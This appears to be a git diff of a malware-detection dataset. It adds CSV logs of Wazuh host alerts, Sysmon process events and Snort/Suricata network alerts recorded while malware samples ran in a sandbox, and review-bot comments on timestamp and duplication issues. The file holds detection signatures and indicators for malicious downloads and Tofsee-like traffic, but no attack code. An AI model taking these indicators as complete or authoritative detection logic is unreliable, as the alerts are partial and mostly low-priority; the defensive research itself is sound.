+"May 24, 2020 @ 13:35:48.576",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed.
+Old md5sum was: '89598d32459256342f73e9b832b618dc'
+New md5sum is : 'be8a4b502546da3087f02371f0f02c17'
+Old sha1sum was: '68aacf23a86d664018607a7fc5d1379269af8643'
+New sha1sum is : 'bd49702c05c290aaa23685f3c33157cdf7b4ee52'
+"
+"May 24, 2020 @ 13:35:12.904",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed.
+Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e'
+New md5sum is : '497a8c7081c737f07c267a30b1538ff9'
+Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709'
+New sha1sum is : '58d9cdbd07af978efc5e91b8e7a66696280d3b1e'
+"
+"May 24, 2020 @ 13:35:02.451",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility' checksum changed.
+Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e'
+New md5sum is : '44a185f2e5e0fa09edbcbe3e598fe4da'
+Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709'
+New sha1sum is : 'f7a3cf6aa04ebaeee3c4525064299cb2136e4f06'
+"
+"May 24, 2020 @ 13:34:21.640",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,,
+"May 24, 2020 @ 13:34:14.404",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",,
+"May 24, 2020 @ 13:33:28.276",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed.
+Old md5sum was: '497a8c7081c737f07c267a30b1538ff9'
+New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e'
+Old sha1sum was: '58d9cdbd07af978efc5e91b8e7a66696280d3b1e'
+New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709'
+"
+"May 24, 2020 @ 13:33:28.258",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility' checksum changed.
+Old md5sum was: '44a185f2e5e0fa09edbcbe3e598fe4da'
+New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e'
+Old sha1sum was: 'f7a3cf6aa04ebaeee3c4525064299cb2136e4f06'
+New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709'
+"
+"May 24, 2020 @ 13:30:39.703",10,"Multiple Windows error events","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = NT AUTHORITY\SYSTEM; ClientProcessId = 6192; Component = Unknown; Operation = Start IWbemServices::ExecQuery - ROOT\WMI : SELECT * FROM BatteryFullChargedCapacity; ResultCode = 0x80041010; PossibleCause = Unknown""",,
+"May 24, 2020 @ 13:28:02.455",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Security\Policy\PolAdtEv' checksum changed.
+Old md5sum was: '9d15aff4d26f802c3c4d3d74a00d8d4d' +New md5sum is : 'b40de87500ee3eed90c2ce3ce8c7946f' +Old sha1sum was: '11f3afa3902d0fadfcc52e4c051995f536c7d4e2' +New sha1sum is : '2f6e6dd0efd148b1c11d33c91e9cea4a97a84792' +" +"May 24, 2020 @ 13:27:44.693",12,"Sysmon - Suspicious Process - explorer.exe","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:59.936 +ProcessGuid: {df9fc3d3-d17f-5ec7-0000-001067a21a00} +ProcessId: 5328 +Image: C:\Windows\explorer.exe +FileVersion: 10.0.18362.693 (WinBuild.160101.0800) +Description: Windows Explorer +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: EXPLORER.EXE +CommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=F7DC8A74E30E08B9510380274CFB9288,SHA256=C5E88D778C0B118D49BEF467ED059C09B61DEEA505D2A3D5CA1DCC0A5CDF752F,IMPHASH=FE6F775DD0C72FFD106F56930C60A452 +ParentProcessGuid: {df9fc3d3-d0cd-5ec7-0000-0010ccbb0000} +ParentProcessId: 724 +ParentImage: C:\Windows\System32\svchost.exe +ParentCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p""","C:\\Windows\\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:59.943722400Z"",""eventRecordID"":""1087"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:59.936\r\nProcessGuid: 
{df9fc3d3-d17f-5ec7-0000-001067a21a00}\r\nProcessId: 5328\r\nImage: C:\\Windows\\explorer.exe\r\nFileVersion: 10.0.18362.693 (WinBuild.160101.0800)\r\nDescription: Windows Explorer\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: EXPLORER.EXE\r\nCommandLine: C:\\Windows\\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=F7DC8A74E30E08B9510380274CFB9288,SHA256=C5E88D778C0B118D49BEF467ED059C09B61DEEA505D2A3D5CA1DCC0A5CDF752F,IMPHASH=FE6F775DD0C72FFD106F56930C60A452\r\nParentProcessGuid: {df9fc3d3-d0cd-5ec7-0000-0010ccbb0000}\r\nParentProcessId: 724\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch -p\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:59.936"",""processGuid"":""{df9fc3d3-d17f-5ec7-0000-001067a21a00}"",""processId"":""5328"",""image"":""C:\\\\Windows\\\\explorer.exe"",""fileVersion"":""10.0.18362.693 (WinBuild.160101.0800)"",""description"":""Windows Explorer"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""EXPLORER.EXE"",""commandLine"":""C:\\\\Windows\\\\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=F7DC8A74E30E08B9510380274CFB9288,SHA256=C5E88D778C0B118D49BEF467ED059C09B61DEEA505D2A3D5CA1DCC0A5CDF752F,IMPHASH=FE6F775DD0C72FFD106F56930C60A452"",""parentProcessGuid"":""{df9fc3d3-d0cd-5ec7-0000-0010ccbb0000}"",""parentProcessId"":""724"",""parentImage"":""C:\\\\Windows\\\\System32\\\\svchost.exe"",""parentCommandLine"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DcomLaunch -p""}}}" +"May 24, 2020 @ 13:27:44.667",14,"ATT&CK T1036: System File Execution Location Anomaly","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:59.743 +ProcessGuid: {df9fc3d3-d17f-5ec7-0000-00106e921a00} +ProcessId: 4488 +Image: C:\Windows\SysWOW64\explorer.exe +FileVersion: 10.0.18362.693 (WinBuild.160101.0800) +Description: Windows Explorer +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: EXPLORER.EXE +CommandLine: ""C:\Windows\System32\explorer.exe"" /select, ""C:\Users\John Williams\Downloads\Free Alts.txt"" +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-0020df010300} +LogonId: 0x301DF +TerminalSessionId: 1 +IntegrityLevel: High +Hashes: MD5=710CD555C00C29C59152DD50CAA553ED,SHA256=6E6E91554392595D18EE3D691258FC1D23E19DDC1E0BD6C26051DEBB8B70E5FD,IMPHASH=C3681D33DE70933393BD754BC4BCE962 +ParentProcessGuid: {df9fc3d3-d161-5ec7-0000-00101c201600} +ParentProcessId: 5868 +ParentImage: C:\Users\John Williams\Downloads\thisis - Linkvertise Downloader_4159543738.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\thisis - Linkvertise Downloader_4159543738.exe"" RSF /ppn:YyhwYgxaFRAiP211FM5W /mnl""","\""C:\\Windows\\System32\\explorer.exe\"" /select, \""C:\\Users\\John Williams\\Downloads\\Free 
Alts.txt\""","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:59.831367900Z"",""eventRecordID"":""1086"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:59.743\r\nProcessGuid: {df9fc3d3-d17f-5ec7-0000-00106e921a00}\r\nProcessId: 4488\r\nImage: C:\\Windows\\SysWOW64\\explorer.exe\r\nFileVersion: 10.0.18362.693 (WinBuild.160101.0800)\r\nDescription: Windows Explorer\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: EXPLORER.EXE\r\nCommandLine: \""C:\\Windows\\System32\\explorer.exe\"" /select, \""C:\\Users\\John Williams\\Downloads\\Free Alts.txt\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-0020df010300}\r\nLogonId: 0x301DF\r\nTerminalSessionId: 1\r\nIntegrityLevel: High\r\nHashes: MD5=710CD555C00C29C59152DD50CAA553ED,SHA256=6E6E91554392595D18EE3D691258FC1D23E19DDC1E0BD6C26051DEBB8B70E5FD,IMPHASH=C3681D33DE70933393BD754BC4BCE962\r\nParentProcessGuid: {df9fc3d3-d161-5ec7-0000-00101c201600}\r\nParentProcessId: 5868\r\nParentImage: C:\\Users\\John Williams\\Downloads\\thisis - Linkvertise Downloader_4159543738.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\thisis - Linkvertise Downloader_4159543738.exe\"" RSF /ppn:YyhwYgxaFRAiP211FM5W /mnl\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:59.743"",""processGuid"":""{df9fc3d3-d17f-5ec7-0000-00106e921a00}"",""processId"":""4488"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\explorer.exe"",""fileVersion"":""10.0.18362.693 
(WinBuild.160101.0800)"",""description"":""Windows Explorer"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""EXPLORER.EXE"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\explorer.exe\\\"" /select, \\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\Free Alts.txt\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-0020df010300}"",""logonId"":""0x301df"",""terminalSessionId"":""1"",""integrityLevel"":""High"",""hashes"":""MD5=710CD555C00C29C59152DD50CAA553ED,SHA256=6E6E91554392595D18EE3D691258FC1D23E19DDC1E0BD6C26051DEBB8B70E5FD,IMPHASH=C3681D33DE70933393BD754BC4BCE962"",""parentProcessGuid"":""{df9fc3d3-d161-5ec7-0000-00101c201600}"",""parentProcessId"":""5868"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\thisis - Linkvertise Downloader_4159543738.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\thisis - Linkvertise Downloader_4159543738.exe\\\"" RSF /ppn:YyhwYgxaFRAiP211FM5W /mnl""}}}" diff --git a/data/MW_21_NIDS.csv b/data/MW_21_NIDS.csv new file mode 100644 index 0000000..39c426c --- /dev/null +++ b/data/MW_21_NIDS.csv 
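Review bot: The `timestamp` column in this export is the Kibana ingestion time, not the event time — the level-12 and level-14 Sysmon rows are stamped "May 24, 2020 @ 13:27:44" while their embedded `UtcTime`/`systemTime` read 2020-05-22 13:19:59, and the companion data/MW_21_NIDS.csv for the same sample is dated Apr 6, so nothing in this file can be joined to the NIDS alerts on `timestamp`. HIDS_3 looks like a separate detonation of sample 21; the dataset README should say so and name `data.win.eventdata.utcTime` (or add a normalised event-time column) as the field to correlate on, e.g. `timestamp = SIEM ingestion time; use eventdata.utcTime for event ordering`. Separately, several "Integrity checksum changed." rows flip between a real digest and `d41d8cd98f00b204e9800998ecf8427e` / `da39a3ee5e6b4b0d3255bfef95601890afd80709`, which are the MD5 and SHA-1 of empty input — the HKLM\Software\Microsoft\Internet Explorer rows at 13:33:28 (real → empty) and 13:35:02/13:35:12 (empty → real) therefore record the key being emptied or removed and then recreated, not a content modification, and consumers counting checksum-change rows as HIDS detections should treat them as key delete/add events.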
@@ -0,0 +1,19 @@
+"@timestamp",message,"log.file.path"
+"Apr 6, 2020 @ 13:28:04.955","04/06/2020-13:28:03.278729 [**] [1:2013414:10] ET POLICY Executable served from Amazon S3 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 143.204.178.106:80 -> 172.16.2.2:49774","/var/log/suricata/fast.log"
+"Apr 6, 2020 @ 13:28:04.955","04/06/2020-13:28:03.279586 [**] [1:2018959:4] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 143.204.178.106:80 -> 172.16.2.2:49774","/var/log/suricata/fast.log"
+"Apr 6, 2020 @ 13:28:04.955","04/06/2020-13:28:03.279586 [**] [1:2016538:3] ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 143.204.178.106:80 -> 172.16.2.2:49774","/var/log/suricata/fast.log"
+"Apr 6, 2020 @ 13:28:04.954","04/06-13:28:03.264275 [**] [1:2018959:4] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 143.204.178.106:80 -> 172.16.2.2:49774","/var/log/snort/alert.fast"
+"Apr 6, 2020 @ 13:28:04.954","04/06-13:28:03.264275 [**] [1:2016538:2] ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 143.204.178.106:80 -> 172.16.2.2:49774","/var/log/snort/alert.fast"
+"Apr 6, 2020 @ 13:28:04.954","04/06-13:28:03.264275 [**] [1:2016538:2] ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 143.204.178.106:80 -> 172.16.2.2:49774","/var/log/snort/alert.fast"
+"Apr 6, 2020 @ 13:28:04.954","04/06-13:28:03.264274 [**] [1:2013414:5] ET POLICY Executable served from Amazon S3 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 143.204.178.106:80 -> 172.16.2.2:49774","/var/log/snort/alert.fast"
+"Apr 6, 2020 @ 13:16:47.908","04/06-13:16:46.599153 [**] [1:2834935:2] ETPRO USER_AGENTS Observed Suspicious UA (NSISDL/1.2 (Mozilla)) [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:49930 -> 54.236.185.144:80","/var/log/snort/alert.fast"
+"Apr 6, 2020 @ 13:16:47.908","04/06-13:16:46.599153 [**] [1:2831954:3] ETPRO USER_AGENTS Nullsoft Mozilla UA (NSISDL) [**] [Classification: Not Suspicious Traffic] [Priority: 3] {TCP} 172.16.2.2:49930 -> 54.236.185.144:80","/var/log/snort/alert.fast"
+"Apr 6, 2020 @ 13:16:47.908","04/06/2020-13:16:46.700803 [**] [1:2834935:2] ETPRO USER_AGENTS Observed Suspicious UA (NSISDL/1.2 (Mozilla)) [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:49930 -> 54.236.185.144:80","/var/log/suricata/fast.log"
+"Apr 6, 2020 @ 13:16:47.908","04/06/2020-13:16:46.700803 [**] [1:2831954:3] ETPRO USER_AGENTS Nullsoft Mozilla UA (NSISDL) [**] [Classification: Not Suspicious Traffic] [Priority: 3] {TCP} 172.16.2.2:49930 -> 54.236.185.144:80","/var/log/suricata/fast.log"
+"Apr 6, 2020 @ 13:16:44.906","04/06-13:16:42.021205 [**] [1:2834935:2] ETPRO USER_AGENTS Observed Suspicious UA (NSISDL/1.2 (Mozilla)) [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:49928 -> 54.236.185.144:80","/var/log/snort/alert.fast"
+"Apr 6, 2020 @ 13:16:44.906","04/06-13:16:42.021205 [**] [1:2831954:3] ETPRO USER_AGENTS Nullsoft Mozilla UA (NSISDL) [**] [Classification: Not Suspicious Traffic] [Priority: 3] {TCP} 172.16.2.2:49928 -> 54.236.185.144:80","/var/log/snort/alert.fast"
+"Apr 6, 2020 @ 13:16:44.906","04/06/2020-13:16:42.119180 [**] [1:2834935:2] ETPRO USER_AGENTS Observed Suspicious UA (NSISDL/1.2 (Mozilla)) [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:49928 -> 54.236.185.144:80","/var/log/suricata/fast.log"
+"Apr 6, 2020 @ 13:16:44.906","04/06/2020-13:16:42.119180 [**] [1:2831954:3] ETPRO USER_AGENTS Nullsoft Mozilla UA (NSISDL) [**] [Classification: Not Suspicious Traffic] [Priority: 3] {TCP} 172.16.2.2:49928 -> 54.236.185.144:80","/var/log/suricata/fast.log"
+"Apr 6, 2020 @ 13:16:37.891","04/06/2020-13:16:36.859221 [**] [1:2028810:2] ET JA3 Hash - [Abuse.ch] Possible Tofsee [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49925 -> 205.196.123.34:443","/var/log/suricata/fast.log"
+"Apr 6, 2020 @ 13:16:37.890","04/06/2020-13:16:36.116915 [**] [1:2028810:2] ET JA3 Hash - [Abuse.ch] Possible Tofsee [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49923 -> 205.196.123.34:443","/var/log/suricata/fast.log"
+"Apr 6, 2020 @ 13:16:34.888","04/06/2020-13:16:34.357952 [**] [1:2028810:2] ET JA3 Hash - [Abuse.ch] Possible Tofsee [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49920 -> 104.28.11.72:443","/var/log/suricata/fast.log"
diff --git a/data/MW_22_HIDS_1.csv b/data/MW_22_HIDS_1.csv
new file mode 100644
index 0000000..749842a
--- /dev/null
+++ b/data/MW_22_HIDS_1.csv
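Review bot: The file interleaves Snort (`/var/log/snort/alert.fast`) and Suricata (`/var/log/suricata/fast.log`) alerts for the same packets, and the Snort row for SID 2016538 at 13:28:03.264275 appears twice verbatim, so a plain row count overstates NIDS detections roughly two-fold; whoever derives the Overview's `Result_NIDS` flag from this should dedupe on (`log.file.path`, SID, 5-tuple, sensor timestamp) or evaluate each sensor separately. The two sensors also use different timestamp formats (`04/06-13:28:03` with no year versus `04/06/2020-13:28:03`), which a README line such as `message is the raw fast.log line; Snort timestamps omit the year` would spare downstream parsers from guessing. Note too that apart from the Priority-1 PE download, every row here is policy or informational (Priority 2–3, "Not Suspicious Traffic", a JA3 "Possible Tofsee" match classified "Unknown Traffic"), so counting any alert as a positive detection is a methodological choice the dataset should state explicitly.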
@@ -0,0 +1,1188 @@ +timestamp,"rule.level","rule.description","full_log" +"Apr 6, 2020 @ 14:40:01.945",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:39:58.381",8,"Windows Audit Policy changed", +"Apr 6, 2020 @ 14:39:58.366",8,"Windows Audit Policy changed", +"Apr 6, 2020 @ 14:39:51.069",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: 'c4a796c4c34771728ed542fd1a758c62' +New md5sum is : '93c2f688a68bea92ca0316b543b731f9' +Old sha1sum was: '6390383b035997e115a3b000b6de17b37d1d41e4' +New sha1sum is : '562310fa74b7d8dc4147b75600dba6658f8f1bc8' +" +"Apr 6, 2020 @ 14:39:51.053",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '2a59348304c018619f9ec9335491c9b3' +New md5sum is : 'a0df8d6e879d924da3288b2aa0b85114' +Old sha1sum was: '8b9b67bed7bf33200a32a2aebb4f71c9fae666aa' +New sha1sum is : '5b3369bb152c26552a26be399f0ea043686a36fe' +" +"Apr 6, 2020 @ 14:39:49.709",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows' checksum changed. +Old md5sum was: 'a94ecbd5eaeee72bd7ceca1faad96e30' +New md5sum is : '49574a9da5b73510ecb8125c7786d037' +Old sha1sum was: '269518a35686493cde84837b1668ea322e4d3d13' +New sha1sum is : 'fc3c9a4be6b806a974693af1dc528845db7631da' +" +"Apr 6, 2020 @ 14:39:39.131",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient' checksum changed. 
+Old md5sum was: '729d0877659e4797d3983fddb4576047' +New md5sum is : 'f7ede040f0bd50f2432cce9ba9720243' +Old sha1sum was: '109945df285ffff37e08eaab1d91e55cb59c26c8' +New sha1sum is : '01b3e39aa29d8c3fccfcaa1089c2a0890d3baaae' +" +"Apr 6, 2020 @ 14:39:39.100",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: '756dd006ccddd9a3acb123069bbf2b72' +New md5sum is : 'f65ebed619edcfc8fafe21f958215b53' +Old sha1sum was: 'ad92ac4e2be1d65930f4d4ed78dab3ae8577c070' +New sha1sum is : '493297f96d762981a98fbe5f8c5b5782c30b65aa' +" +"Apr 6, 2020 @ 14:39:39.084",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: 'b0fa798f750e19e3ddbcd77f4321253f' +New md5sum is : '619d435b1dac461a9b0cfd3b48ee8f37' +Old sha1sum was: '759d4aa41127af628c11a6761e1f5d9bdf9412ed' +New sha1sum is : '95d0826303f42e23fada9a211bd9ea71de2d5c51' +" +"Apr 6, 2020 @ 14:39:38.288",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: '4dc723cacf24668548d4626cd43a3355' +New md5sum is : 'a6934418b12b085c34f2dbaa9e9fa7a0' +Old sha1sum was: 'd81ab069195c4657ae5fbbccadc8597e7deedd15' +New sha1sum is : 'd9336cc746599b17846d9aa0e03da9cf70d1f3b7' +" +"Apr 6, 2020 @ 14:39:36.944",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vid\Parameters\Wdf' checksum changed. +Old md5sum was: 'fcdb07c6a1ed824ae9455a64b2c0bb9e' +New md5sum is : '67c10bdce559c177fe0d89a2be194410' +Old sha1sum was: '584b2e2ecab9f7b853efa748028018d4698a2e87' +New sha1sum is : '4bac1afb15742d4fecc03d097a595ea33eed5376' +" +"Apr 6, 2020 @ 14:39:36.709",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vdrvroot\Parameters\Wdf' checksum changed. 
+Old md5sum was: '320bb6f0c3f0f9ca6201376818440454' +New md5sum is : 'b132e65b4963a54ebee91bcab8914621' +Old sha1sum was: '6f0a84fcaed413ed440ea1ba902efe1c0d69c1ef' +New sha1sum is : '744e1fde2f3ae486cbff69a205e315e1c2f088e3' +" +"Apr 6, 2020 @ 14:39:35.975",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBXHCI\Parameters\Wdf' checksum changed. +Old md5sum was: '00f520782a4ab535f2911267c06438d9' +New md5sum is : 'f6949813e6b9d992278b95b7f209e047' +Old sha1sum was: 'bff3f6156b18df9a1ad0d484b5296bda6e699299' +New sha1sum is : '8db1fc943f83c30b4bc07f1ed394492c392e7722' +" +"Apr 6, 2020 @ 14:39:35.803",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBHUB3\Parameters\Wdf' checksum changed. +Old md5sum was: '8e9cef389829897cea6eca230b2aa97f' +New md5sum is : '342765c52f3fd7b50e5188adb30a0ede' +Old sha1sum was: 'cc8206466c207f0619ed289d336d1d965992e198' +New sha1sum is : '6d803f7cc7de0ae861402e45b8a1442595a4b544' +" +"Apr 6, 2020 @ 14:39:34.678",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\umbus\Parameters\Wdf' checksum changed. +Old md5sum was: 'fcdb07c6a1ed824ae9455a64b2c0bb9e' +New md5sum is : '67c10bdce559c177fe0d89a2be194410' +Old sha1sum was: '584b2e2ecab9f7b853efa748028018d4698a2e87' +New sha1sum is : '4bac1afb15742d4fecc03d097a595ea33eed5376' +" +"Apr 6, 2020 @ 14:39:32.819",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. 
+Old md5sum was: '05e13bdf1f9b7eb3a1f3de4ca253e89f' +New md5sum is : 'bb30a4865d0fe96a2d7b53b843e8fa0a' +Old sha1sum was: 'feaa05d6b5b4ac5a77156e9c4c2199f6a91a5917' +New sha1sum is : '98ca91600e4060c62dc2cc91468e632c4fdc3ef6' +" +"Apr 6, 2020 @ 14:39:29.226",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\srvnet\Parameters' checksum changed. +Old md5sum was: 'b7992042185fc6ec85e366e31893c993' +New md5sum is : '3d3a643354245020081ae89e531e5f43' +Old sha1sum was: '7da8cd2c012f8b55d1d5ce23f9ccdf45379c55ad' +New sha1sum is : '388ea0001ce3a9c23720ba87edb0e1b1510b7b4e' +" +"Apr 6, 2020 @ 14:39:27.506",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules' checksum changed. +Old md5sum was: '646af30f5e20cdfc4f2c28c8e09ff02c' +New md5sum is : 'b6d3909639832341a734894d33f7c650' +Old sha1sum was: '218e9b8a8ae906e403df7e730096ad92886a7c1c' +New sha1sum is : 'f68965cba98e801d041406d6307c4869db9673a4' +" +"Apr 6, 2020 @ 14:39:26.787",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules' checksum changed. +Old md5sum was: 'b0d74b8b9da27bf097def0edef51976a' +New md5sum is : '1671bba53566796b1903734f3349f205' +Old sha1sum was: '85c2962a659d70880b1f863906002042ff403691' +New sha1sum is : '708d4d45b3b663519de7d168bcad8f1b3c5b0c7a' +" +"Apr 6, 2020 @ 14:39:26.726",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch2' checksum changed. 
